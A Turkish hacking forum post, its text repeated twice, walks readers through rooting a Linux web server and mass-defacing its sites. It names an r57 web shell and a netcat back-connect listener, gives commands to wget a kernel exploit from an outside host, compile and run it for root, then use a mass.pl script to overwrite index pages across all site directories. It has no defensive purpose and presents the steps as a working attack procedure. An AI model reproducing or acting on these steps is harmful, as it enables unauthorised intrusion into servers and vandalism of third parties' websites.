Selamun Aleykum Arkadaşlar
bu konumda sizlere Linux Server Rooting anlatmaya çalışacağım.
bu işlev için Safe mod Off olması ve bir portunuzun açık olması gerekmektedir.
Neler yapmamız gerek sorusunada kısaca özetleyeyim.
1er adet.
netcat (hangi işletim sistemini kullanıyorsanız mesela ben windows versiyonunu indireceğim)
Shell( bc olmak için ideal shell olan r57’yi öneririm.)
mass.pl(toplu deface için kullanacagımız perl)
netcat programını google’dan indirip ilgili klasöre atınız.
ve win+r tuşuna basarak çalıştıra geçelim.
Arkadaşlar server’a baglanmayı şu şekilde özetleyeyim. Server’da bc olduk ve serverla pcmiz arasında bir bilgi
alışverişi olması gerek bu iş için bir portunuz açık olması gerek (önerilerim: 8888,2121,434) bu portlardan birini
açıp server’a baglanıyoruz önce açık portta girmemiz gerek çalıştır’a geçtiğimizi varsayarak şu işlemleri yapıyoruz
nc -vv -l -p 888 (// benim 8888 portum açık sizin hangi portunuz açık ise onu yazınız)
şöyle bir ekran gelmesi gerek.
bu ekran geldiyse birdahaki işleminiz shell üzerinden’de baglantıyı kurmamız gerek bunun için
Resimde görülen bc kısmına gelip 11457 silmeniz gerekiyor.
sildikden sonraki işleminiz kendi portunuzu yazıp baglan demeniz yeterli.
baglandıkdan sonra size dos’da şöyle bir yazılar gelicek...
connect to [10.0.3.3] from server.myhost.com (ip adresleri)
ve linux sürümü.(Linux 2.6.18 - 2011) gibi...
uid=24<apache> gid=24<apache> groups=24<apache>
bu işlemleriniz gerçekleşmesi demek server ile baglanıldıgının işaretidir.
ve bu işlemlerde linux sürümünü öğreniyoruz burada dikkat etmemiz gerekn bir husus var.
gerekli sürüm için gerekli exploiti derlememiz ve server üzerinde yetki vermemiz gerekmektedir.
ben mesela Linux 2.6.18 - 2011 exploiti bulup derliyorum ( exploit’ler c dilinden yazıldıgı için .c uzantılı
olarak kayıt ediyorum.)
exploit’min adını 2.6.18.c olarak kayıt ediyorum masaüstüme.
Yapmamız gereken 2. aşama ise 1 Server’a upload etmeliyiz.
Ben kendi Server’ıma upload ediyorum.
http://www.muroreis.in/2.6.18.c
-şimdi yapmamız gereken anlattıgım gibi exploitimizi server’a çekmek bu işlev için wget komutu kullanıyoruz
çalıştır’a gelerek işlevleri yapalım.
wget http://www.muroreis.in/2.6.18.c
bu işlev sonunda Saved yani kayıt edildi olması gerekmektedir.
şimdi ise Exploit’mizi derleyeceğiz.
gcc -o root 2.6.18.c
chmod 777 root // Tam yetki veriyoruz.
evet bu işlev sonunda exploitimiz derlenmiş oldu exploitimizi çağırmamız gerekmektedir.
exploitimizi derledik ve root adını aldırdık şimdiki işlem çağırmak olacak Çalıştır’a gelerek
./root
Yazalım.
Evet bu işlev sonunda Exploitimizi çalıştırdık.
şimdi Yetkili olup olmadıgını bakalım
id yazdık.
uid=<root>...
işlemleri geldiyse eger root olmuşuz demektir.
Evet Server Rooting bu kadar ama deface atmayıda anlatacagım.
Deface nedir? Server’a zarar vermeden index atma
Evet şimdi gerekli ekipmanımız mass.pl işlem için öncelikle elinizde bulunması gerek.
şimdi mass.pl shell’imizin bulundugu dizine upload ediyoruz.
ve çalıştır’dan perl’imizi çalıştırıyoruz.
perl mass.pl
ve karşınıza kullanımı gelecekdir büyük ihtimalle.
ve şöyle bir kullanım örneği sunayım.
perl mass.pl /tmp/index.html
bu şu demekdir buradaki indexi tüm dizinlere kopyala.
perl mass.pl /home/clanfo/domains/deneme.com/public_html/index.html
Evet bu işlev sonunda server’da bulunan siteler Deface ediliyor.
Whois çekip domainleri kayıt etmeyi unutmayınız.
iyi günler dilerim
bu konumda sizlere Linux Server Rooting anlatmaya çalışacağım.
bu işlev için Safe mod Off olması ve bir portunuzun açık olması gerekmektedir.
Neler yapmamız gerek sorusunada kısaca özetleyeyim.
1er adet.
netcat (hangi işletim sistemini kullanıyorsanız mesela ben windows versiyonunu indireceğim)
Shell( bc olmak için ideal shell olan r57’yi öneririm.)
mass.pl(toplu deface için kullanacagımız perl)
netcat programını google’dan indirip ilgili klasöre atınız.
ve win+r tuşuna basarak çalıştıra geçelim.
Arkadaşlar server’a baglanmayı şu şekilde özetleyeyim. Server’da bc olduk ve serverla pcmiz arasında bir bilgi
alışverişi olması gerek bu iş için bir portunuz açık olması gerek (önerilerim: 8888,2121,434) bu portlardan birini
açıp server’a baglanıyoruz önce açık portta girmemiz gerek çalıştır’a geçtiğimizi varsayarak şu işlemleri yapıyoruz
nc -vv -l -p 888 (// benim 8888 portum açık sizin hangi portunuz açık ise onu yazınız)
şöyle bir ekran gelmesi gerek.
bu ekran geldiyse birdahaki işleminiz shell üzerinden’de baglantıyı kurmamız gerek bunun için
Resimde görülen bc kısmına gelip 11457 silmeniz gerekiyor.
sildikden sonraki işleminiz kendi portunuzu yazıp baglan demeniz yeterli.
baglandıkdan sonra size dos’da şöyle bir yazılar gelicek...
connect to [10.0.3.3] from server.myhost.com (ip adresleri)
ve linux sürümü.(Linux 2.6.18 - 2011) gibi...
uid=24<apache> gid=24<apache> groups=24<apache>
bu işlemleriniz gerçekleşmesi demek server ile baglanıldıgının işaretidir.
ve bu işlemlerde linux sürümünü öğreniyoruz burada dikkat etmemiz gerekn bir husus var.
gerekli sürüm için gerekli exploiti derlememiz ve server üzerinde yetki vermemiz gerekmektedir.
ben mesela Linux 2.6.18 - 2011 exploiti bulup derliyorum ( exploit’ler c dilinden yazıldıgı için .c uzantılı
olarak kayıt ediyorum.)
exploit’min adını 2.6.18.c olarak kayıt ediyorum masaüstüme.
Yapmamız gereken 2. aşama ise 1 Server’a upload etmeliyiz.
Ben kendi Server’ıma upload ediyorum.
http://www.muroreis.in/2.6.18.c
-şimdi yapmamız gereken anlattıgım gibi exploitimizi server’a çekmek bu işlev için wget komutu kullanıyoruz
çalıştır’a gelerek işlevleri yapalım.
wget http://www.muroreis.in/2.6.18.c
bu işlev sonunda Saved yani kayıt edildi olması gerekmektedir.
şimdi ise Exploit’mizi derleyeceğiz.
gcc -o root 2.6.18.c
chmod 777 root // Tam yetki veriyoruz.
evet bu işlev sonunda exploitimiz derlenmiş oldu exploitimizi çağırmamız gerekmektedir.
exploitimizi derledik ve root adını aldırdık şimdiki işlem çağırmak olacak Çalıştır’a gelerek
./root
Yazalım.
Evet bu işlev sonunda Exploitimizi çalıştırdık.
şimdi Yetkili olup olmadıgını bakalım
id yazdık.
uid=<root>...
işlemleri geldiyse eger root olmuşuz demektir.
Evet Server Rooting bu kadar ama deface atmayıda anlatacagım.
Deface nedir? Server’a zarar vermeden index atma
Evet şimdi gerekli ekipmanımız mass.pl işlem için öncelikle elinizde bulunması gerek.
şimdi mass.pl shell’imizin bulundugu dizine upload ediyoruz.
ve çalıştır’dan perl’imizi çalıştırıyoruz.
perl mass.pl
ve karşınıza kullanımı gelecekdir büyük ihtimalle.
ve şöyle bir kullanım örneği sunayım.
perl mass.pl /tmp/index.html
bu şu demekdir buradaki indexi tüm dizinlere kopyala.
perl mass.pl /home/clanfo/domains/deneme.com/public_html/index.html
Evet bu işlev sonunda server’da bulunan siteler Deface ediliyor.
Whois çekip domainleri kayıt etmeyi unutmayınız.
iyi günler dilerim
